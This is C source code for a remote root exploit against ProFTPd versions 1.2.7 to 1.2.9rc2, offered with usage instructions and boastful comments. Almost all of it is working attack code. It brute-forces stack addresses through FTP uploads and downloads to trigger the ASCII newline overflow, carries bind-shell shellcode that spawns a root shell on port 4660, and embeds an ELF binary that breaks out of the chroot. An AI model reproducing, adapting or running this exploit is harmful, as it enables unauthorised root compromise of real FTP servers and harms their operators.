/*
 ProFTPd 1.2.7 - 1.2.9rc2 remote r00t exploit
 --------------------------------------------
 By Haggis

 This exploit builds on the work of bkbll to
 create a working, brute-force remote exploit
 for the \n procesing bug in ProFTPd.

 Tested on SuSE 8.0, 8.1 and RedHat 7.2/8.0
 it works quite well... the RedHat boxes
 worked on stack addresses in the 0xbffff2xx
 region; the SuSE boxes were somewhat earlier
 in the stack space - around 0xbfffe8xx.

 This is the only public version you'll see
 from Haggis@Doris - but it is very likely
 that more powerful private versions will
 be coded.

 At present, this exploit breaks chroot (if
 any) and spawns a shell bound to port 4660.

 ----------

 This version is best run like so:

 ./proft_put_down -t hostname -l localIP -U incoming

 where:
  
  hostname = target box
  localIP  = your IP address
  
 -U incoming specifies that the exploit will attempt
 to create an 'incoming' directory on the remote ftp
 server and work inside that. Without it, the shell-
 code will probably not work properly. You have been
 warned!

 It is possible to use other credentials for logging
 in to remote servers; anonymous is the default.

 ----------

 Big greets to all in #cheese on Doris (SSL only:
 doris.scriptkiddie.net:6969).

 Special thanks to B-r00t for testing and pointing
 out a segfault, flame for letting me r00t his 
 RedHat 8 box and everyone else for their input.

 Have a nice root.

 H.
*/

#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>

#define STACK_START			0xbfffef04
#define STACK_END			0xbffff4f0
#define FTP_PORT			21
#define BINDSHELL_PORT		4660
#define SIZE				1024
#define EXPLOIT_BUF_SIZE	65535
#define DEFAULT_USER		"anonymous"
#define DEFAULT_PASS		"ftp@"
#define FAILURE				-1
#define SUCCESS				0
#define NORMAL_DOWNLOAD		1
#define EXPLOIT_DOWNLOAD	2
#define DOWNLOAD			3
#define UPLOAD				4
#define ACCEPT_TIMEOUT		5
#define SLEEP_DELAY			19999999

/*
  Leet 0-day HaggisCode (tm)
*/
char shellcode[] =
	// setuid(0); setgid(0);
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"

	// fork() - parent terminates, killing proftpd and ending FTP
	// session.  This leaves the child process as a daemon...
	"\x31\xc0\xb0\x02\xcd\x80\x89\xc3\x85\xdb\x74\x08\x31"
	"\xdb\x31\xc0\xb0\x01\xcd\x80"

 	// Finally, bind a shell to port 4660.
	// This is a hacked version of the bindshell code by BigHawk.
	"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
	"\x89\xc7\x52\x66\x68\x12\x34\x43\x66\x53\x89\xe1\xb0\x10\x50\x51"
	"\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57"
	"\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
	"\x41\xe2\xf8\x51\x68\x2e\x2f\x61\x61\x89\xe3\x51\x53\x89\xe1\xb0"
	"\x0b\xcd\x80";

int controlSock, passiveSock;
int currentPassivePort=32769;
int currentServerPort=31337;
int exploitBufLen;
int attemptNumber=0;
int ftpPort=FTP_PORT;
unsigned int stackWriteAddr, retAddr;
char serverBuf[SIZE];
char exploitBuf[EXPLOIT_BUF_SIZE];
char uploadPath[SIZE]="";
char filename[SIZE*2];
char *server=NULL;
char *user=DEFAULT_USER;
char *pass=DEFAULT_PASS;
char *localIP=NULL;
char errorBuf[SIZE];

int connect_to_server(int port);
int login_to_server();
int set_passive_mode(int mode);
int set_ascii_mode();
int set_path_and_filename();
int check_for_linefeed();
int check_status();
int create_passive_server();
int create_exploit_buffer();
int upload_file();
int download_file(int mode);
void usage(char *s);
int do_remote_shell(int shellSock);
void status_bar(char *info);
int timeout_accept(int s, struct sockaddr *sa, int *f);
void my_send(int s, char *b, ...);
void my_recv(int s);
void my_sleep(int n);
void doris_chroot_breaker();

int main(int argc,char **argv)
{
	int sleepMode=0;
	char c;
	unsigned int stackStartAddr=STACK_START;

	if(argc<2) usage(argv[0]);
	while((c = getopt(argc, argv, "t:u:p:l:U:sP:S:"))!= EOF) {
		switch (c) {
			case 't':
				server=optarg;
				break;
			case 'u':
				user=optarg;
				break;
			case 'p':
				pass=optarg;
				break;
			case 'l':
				localIP=optarg;
				break;
			case 's':
				sleepMode=1;
				break;
			case 'U':
				strncpy(uploadPath,optarg,SIZE);
				break;
			case 'P':
				ftpPort=atoi(optarg);
				break;
			case 'S':
				stackStartAddr=strtoul(optarg, NULL, 16);
				break;
			default:
				usage(argv[0]);
				return 1;
		}
	}
	if(server==NULL || localIP==NULL)
		usage(argv[0]);

	printf("proftpd 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
	printf(" by Haggis (haggis@haggis.kicks-ass.net)\n");

	doris_chroot_breaker();
	for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {

		if(check_for_linefeed()==FAILURE)
			continue;

		retAddr=stackWriteAddr+200; // good enough for show business
		
		if((controlSock=connect_to_server(ftpPort))==FAILURE) {
			perror("\n\nFailing to connect to remote host\n");
			exit(1);
		}

		if(login_to_server()==FAILURE) {
			close(controlSock);
			printf("\nERROR: Login failed.\n");
			exit(1);
		}

		if(set_passive_mode(UPLOAD)==FAILURE)
			goto err;
		if(set_ascii_mode()==FAILURE)
			goto err;
		if(set_path_and_filename()==FAILURE)
			goto err;

		// create the buffer containing RET for this
		// brute-force iteration
		create_exploit_buffer();

		if(upload_file()==FAILURE)
			goto err;
		close(controlSock);

		// Connect again, then login, set ASCII mode and download the exploit file.
		// This will trigger the overflow; as a result, we've
		// corrupted the memory pool of this session and when we
		// download the file again, the stack area will be overwritten
		// and we control the saved EIP.

		if((controlSock=connect_to_server(ftpPort))<0) {
			perror("\nFailed to connect to remote host\n");
			exit(1);
		}
		
		login_to_server(user,pass);
		set_path_and_filename();
		if(set_ascii_mode()==FAILURE)
			goto err;
		if(set_passive_mode(DOWNLOAD)==FAILURE)
			goto err;
		if(sleepMode)
			sleep(10);
		if(download_file(NORMAL_DOWNLOAD)==FAILURE)
			goto err;

		// Finally, read the file again. This will trigger the stack
		// overwrite (NOT the overflow, that happened earlier). We could
		// control EIP at this point and r00t may be only heartbeat away...

		if(set_passive_mode(DOWNLOAD)==FAILURE)
			goto err;
		if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
			goto err;
	err:	
		close(controlSock);
	}

	// This is only reached if the bruteforce fails.
	// delete the exploit files here

	printf("\n\nNo r00t for you today I'm afraid.\n");
	exit(1);
}

void status_bar(char *info) {
	printf("[ %20s ]-[ Stack: 0x%08x ]-[ RET: 0x%08x ]\r",info, stackWriteAddr,retAddr);
	fflush(stdout);
}

int set_path_and_filename()
{
	status_bar("Setting filename");
	if(strcmp(uploadPath,"")) {
		my_send(controlSock, "CWD %s\r\n",uploadPath);
		my_recv(controlSock);
	}
	snprintf(filename,SIZE,"proft_put_down-%d-%d.txt",getpid(),attemptNumber);
	return SUCCESS;
}

int download_file(int mode)
{
	int len, localServerSock, dataSock, bindShellSock;
	struct sockaddr_in localServer;

	status_bar("Downloading");
	// Ask the victim server to send us the exploit file
	my_send(controlSock, "RETR %s\r\n", filename);

	// Create a listening server on our passive port to
	// receive the data
	memset(&localServer,0,sizeof(localServer));
	localServerSock=create_passive_server();
	len=sizeof(localServer);

	// Wait for a few seconds for the victim server to contact us...
	if((dataSock=timeout_accept(localServerSock,(struct sockaddr *)&localServer,&len))<0) {
		close(localServerSock);
		return FAILURE;
	}

	// If the mode is EXPLOIT_DOWNLOAD, then this is the
	// second attempt at downloading... that means we might
	// have a shell waiting for us on the victim server, so
	// we try to connect to it
	if(mode==EXPLOIT_DOWNLOAD) {
		if((bindShellSock=connect_to_server(BINDSHELL_PORT))>=0) {
			printf("\nConnected! You are r00t...\n");
			do_remote_shell(bindShellSock);
			printf("\nDid you have a nice time?\n");
			exit(0);
		}	
		close(dataSock);
		close(localServerSock);
		return SUCCESS;
	}
	// If the mode is NORMAL_DOWNLOAD, then just clean up the
	// connection by receiving the file from the server; closing
	// the data and local server sockets, then read the confirmation
	// message from the control socket
	my_recv(dataSock);
	close(dataSock);
	close(localServerSock);
	my_recv(controlSock);
	return check_status();
}

int timeout_accept(int s, struct sockaddr *sa, int *f)
{
	fd_set fdset;
	struct timeval timeout = { ACCEPT_TIMEOUT, 0 }; // seconds
	int result;

	if(s<=0)
		return FAILURE;
	FD_ZERO(&fdset);
	FD_SET(s, &fdset);
	
	if((result=select(s+1, &fdset, 0, 0, &timeout))==0)
		return FAILURE;
	return accept(s,sa,f);
}

int set_passive_mode(int mode)
{
	int portMSB, portLSB;
	int x1,x2,x3,x4;
	char *ptr=localIP, *start;

	status_bar("Setting passive");
	if(mode==DOWNLOAD) {
		if((++currentPassivePort) > 35000)
			currentPassivePort=32789;
	
		while(*(++ptr))
			if(*ptr=='.')
				*ptr=',';
		portMSB=(currentPassivePort >> 8 ) & 0xff;
		portLSB=currentPassivePort & 0xff;
		my_send(controlSock, "PORT %s,%d,%d\r\n", localIP, portMSB, portLSB);
		my_recv(controlSock);
		return check_status();
	} else {	
		my_send(controlSock, "PASV\r\n");
		my_recv(controlSock);
		if(check_status()==FAILURE)
			return FAILURE;
		ptr=serverBuf;
		while(*ptr && *ptr!='(')
			ptr++;
		if(*ptr=='\0')
			return FAILURE;
		start=ptr+1;
		while(*ptr && *ptr!=')')
			ptr++;
		*ptr=0;
		sscanf(start, "%d,%d,%d,%d,%d,%d",&x1, &x2, &x3, &x4, &portMSB, &portLSB);
		currentServerPort=(portMSB << 8) | portLSB;
	}
	return SUCCESS; 
}

int connect_to_server(int port)
{
	struct sockaddr_in serverAddr;
	struct hostent *host;
	int sock, tmp=1;

	status_bar("Connecting");
	if((host=gethostbyname(server))==NULL)
		return FAILURE;

	if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
		return FAILURE;
	bzero(&serverAddr,sizeof(struct sockaddr));
	serverAddr.sin_family=AF_INET;
	serverAddr.sin_port=htons(port);
	serverAddr.sin_addr=*((struct in_addr *)host->h_addr);
	setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp));
	if(connect(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
		close(sock);
		return FAILURE;
	}
	return sock;
}

int check_status()
{
	if(isdigit(serverBuf[0]) && serverBuf[0]!='5')
		return SUCCESS;
	else
		return FAILURE;
}

int login_to_server()
{
	status_bar("Logging in");
	my_recv(controlSock);
	my_send(controlSock, "USER %s\r\n", user);
	my_recv(controlSock);
	if(check_status()==FAILURE)
		return FAILURE;

	my_send(controlSock, "PASS %s\r\n", pass);	
	my_recv(controlSock);
	return check_status();
}

int set_ascii_mode()
{
	status_bar("Setting ASCII mode");
	my_send(controlSock, "TYPE A\r\n");
	my_recv(controlSock);
	return check_status();
}


int upload_file()
{
	int dataSock;

	status_bar("Uploading file");

	// open up the data channel
	if((dataSock=connect_to_server(currentServerPort))==FAILURE)
		return FAILURE;

	// tell server we're gonna send some shiznitz
	my_send(controlSock, "STOR %s\r\n", filename);
	my_recv(controlSock);
	if(check_status()==FAILURE) {
		close(dataSock);
		return FAILURE;
	}

	// send the exploit file to the victim server
	send(dataSock, exploitBuf, exploitBufLen, 0);
	close(dataSock);

	// make sure all went well
	my_recv(controlSock);
	if(check_status()==FAILURE)
		return FAILURE;
	return SUCCESS;
}

int create_exploit_buffer()
{
	int i;
	char buf[41];
	unsigned int writeaddr=stackWriteAddr;
	unsigned int *ptr=(unsigned int *)(exploitBuf+3);
	unsigned int dummy=0x11111111;
	FILE *fp;

	status_bar("Make exploit buf");
	exploitBufLen=1024;
	memset(exploitBuf,0,EXPLOIT_BUF_SIZE);
	memset(exploitBuf,0x90,512);
	*(ptr++)=writeaddr+28;
	for(i=0;i<6;i++)
		*(ptr++)=retAddr;
	*(ptr++)=0;
	for(i=0;i<2;i++)
		*(ptr++)=retAddr;

	memcpy(exploitBuf+512-strlen(shellcode)-1,shellcode,strlen(shellcode));
	memset(exploitBuf+512,'\n',512);

	for(i=0;i<96;i++) {
		memset(buf,0,41);
		if(dummy==0x1111112e)
			// this sets session.d->outstrm to NULL which forces an early return
			// avoids crashing proftpd... on SuSE 8.0 anywayz...
			memcpy(buf,"\n\n\n\n\n\n\n\n\x00\x00\x00\x00\n\n\n\n\n\n\n\n",20);
		else if(dummy==0x11111166)
			// this is the same thing tailored for RH7.2
			memcpy(buf,"\n\n\n\n\n\n\n\n\x72\x00\x00\x00\x00\n\n\n\n\n\n\n",20);
		else
			memset(buf,'\n',20);

		// i used these dummy values to find the correct spot for
		// the session.d->outstrm pointer
		*(unsigned int *)(buf+20)=dummy;
		*(unsigned int *)(buf+24)=dummy;
		*(unsigned int *)(buf+28)=dummy;

		// this will become the address of an available chunk of memory
		// that is returned by new_block() in pool.c
		*(unsigned int *)(buf+32)=writeaddr;

		// this is what will be returned by palloc() in pool.c
		// palloc() is the function that calls new_block() and
		// provides the allocation interface for the pools system.
		*(unsigned int *)(buf+36)=writeaddr;

		memcpy(exploitBuf+exploitBufLen,buf,40);
		exploitBufLen+=40;
		dummy++;
	}
	return SUCCESS;
}


int create_passive_server()
{
	struct sockaddr_in serverAddr;
	int on=1,sock;

	status_bar("Creating server");
	sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
	memset(&serverAddr,0,sizeof(struct sockaddr_in));
	serverAddr.sin_port=htons(currentPassivePort);
	serverAddr.sin_family=AF_INET;
	serverAddr.sin_addr.s_addr=htonl(INADDR_ANY);
	setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));
	if(bind(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
		close(sock);
		return FAILURE;
	}
	if(listen(sock,5)<0) {
		close(sock);
		return FAILURE;
	}
	return sock;
}

void usage(char *exploitName)
{
	printf("proftpd 1.2.7 - 1.2.9rc2 remote root exploit\n");
	printf(" based on code by bkbll (bkbll@cnhonker.net)\n");
	printf(" by Haggis (haggis@haggis.kicks-ass.net)\n");
	printf("--------------------------------------------------------------\n");
	printf("Usage: %s -t host -l ip [options]\n",exploitName);
	printf("Arguments:\n");
	printf("      -t <host>     host to attack\n");
	printf("      -u <username> [anonymous]\n");
	printf("      -p <password> [ftp@microsoft.com]\n");
	printf("      -l <local ip address> interface to bind to\n");
	printf("      -s sleep for 10secs to allow GDB attach\n");
	printf("      -U <path>     specify upload path, eg. /incoming\n");
	printf("      -P <port>     port number of remote proftpd server\n");
	printf("      -S <address>  start at <address> when bruteforcing\n");
exit(0);
}


int do_remote_shell(int shellSock)
{
	fd_set rfds;
	char buf[1024];
	int retval, r=1;

        do {
                FD_ZERO(&rfds);
                FD_SET(0, &rfds);
                FD_SET(shellSock, &rfds);
                retval=select(shellSock+1, &rfds, NULL, NULL, NULL);
                if(retval) {
                        if(FD_ISSET(shellSock, &rfds)) {
                                buf[(r=recv(shellSock, buf, sizeof(buf)-1,0))]='\0'; // lol
                                printf("%s", buf);fflush(stdout);
                        }
                        if(FD_ISSET(0, &rfds)) {
                                buf[(r=read(0, buf, sizeof(buf)-1))]='\0'; // lmfao
                                send(shellSock, buf, strlen(buf), 0);
                        }
                }
        } while(retval && r); // loop until connection terminates
	return SUCCESS;
}


int check_for_linefeed()
{
	char *ptr=(char *)&stackWriteAddr;
	int i=4;

	for(;i;i--)
		if(*(ptr++)=='\n')
			return FAILURE;
	return SUCCESS;
}

// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
	va_list ap;
	char *buf;

	my_sleep(SLEEP_DELAY);
	va_start(ap,b);
	vasprintf(&buf,b,ap);
	send(s,buf,strlen(buf),0);
	va_end(ap);
	free(buf);
}

// Another handy function to read data from a socket.
void my_recv(int s) {
	int len;

	my_sleep(SLEEP_DELAY);
	memset(serverBuf, 0, SIZE);
	len=recv(s, serverBuf, SIZE-1, 0);
	serverBuf[len]=0;
}

void doris_chroot_breaker() {
	char haggis_magic_buffer[]=
	"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x34\x00\x00\x00"
	"\xa0\x01\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00"
	"\x09\x00\x08\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08"
	"\x00\x80\x04\x08\x20\x01\x00\x00\x20\x01\x00\x00\x05\x00\x00\x00"
	"\x00\x10\x00\x00\x01\x00\x00\x00\x20\x01\x00\x00\x20\x91\x04\x08"
	"\x20\x91\x04\x08\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00"
	"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x55\x89\xe5\x83\xec\x6c\x57\x56\x53\x8d\x45\xa0\x8d\x7d\xa0\xbe"
	"\xc0\x80\x04\x08\xfc\xb9\x17\x00\x00\x00\xf3\xa5\x66\xa5\xa4\x8d"
	"\x45\xa0\x89\x45\x9c\x8b\x5d\x9c\xff\xd3\x8d\x65\x88\x5b\x5e\x5f"
	"\x89\xec\x5d\xc3\x8d\xb6\x00\x00\x00\x00\x8d\xbf\x00\x00\x00\x00"
	"\x31\xc0\x31\xdb\x40\x50\x89\xe1\x66\xbb\x73\x68\x53\x89\xe3\xb0"
	"\x27\xcd\x80\x31\xc0\x89\xe3\xb0\x3d\xcd\x80\x31\xc9\xb1\x0a\x31"
	"\xc0\x31\xdb\x66\xbb\x2e\x2e\x53\x89\xe3\xb0\x0c\xcd\x80\x49\x85"
	"\xc9\x75\xec\x31\xc0\x31\xdb\xb3\x2e\x53\x89\xe3\xb0\x3d\xcd\x80"
	"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
	"\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x00\x00"
	"\x00\x47\x43\x43\x3a\x20\x28\x47\x4e\x55\x29\x20\x32\x2e\x39\x35"
	"\x2e\x33\x20\x32\x30\x30\x31\x30\x33\x31\x35\x20\x28\x53\x75\x53"
	"\x45\x29\x00\x08\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x30"
	"\x31\x2e\x30\x31\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00"
	"\x2e\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61"
	"\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00"
	"\x2e\x64\x61\x74\x61\x00\x2e\x73\x62\x73\x73\x00\x2e\x62\x73\x73"
	"\x00\x2e\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x2e\x6e\x6f\x74\x65\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x01\x00\x00\x00"
	"\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x40\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
	"\x21\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\xc0\x80\x04\x08"
	"\xc0\x00\x00\x00\x60\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x20\x00\x00\x00\x00\x00\x00\x00\x29\x00\x00\x00\x01\x00\x00\x00"
	"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
	"\x2f\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x20\x91\x04\x08"
	"\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x01\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x08\x00\x00\x00"
	"\x03\x00\x00\x00\x20\x91\x04\x08\x20\x01\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00"
	"\x3a\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x20\x01\x00\x00\x23\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x01\x00\x00\x00\x00\x00\x00\x00\x43\x00\x00\x00\x07\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x43\x01\x00\x00\x14\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
	"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x57\x01\x00\x00\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x01\x00\x00\x00\x00\x00\x00\x00";

	strcpy(filename, "aa");
	memset(exploitBuf,0,777);
	memcpy(exploitBuf, haggis_magic_buffer, 776);
	exploitBufLen=776;
	if((controlSock=connect_to_server(ftpPort))==FAILURE) {
		printf("\nCould not connect to target server\n");
		exit(1);
	}
	login_to_server();
	my_send(controlSock, "MKD incoming\r\n");
	my_recv(controlSock);
	my_send(controlSock, "SITE CHMOD 777 incoming\r\n");
	my_recv(controlSock);
	my_send(controlSock, "CWD incoming\r\n");
	my_recv(controlSock);
	set_passive_mode(UPLOAD);
	upload_file();
	my_send(controlSock, "SITE CHMOD 777 aa\r\n");
	close(controlSock);
}

// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
	struct timespec t;

	t.tv_sec=0;
	t.tv_nsec=n;
	nanosleep(&t,&t);
}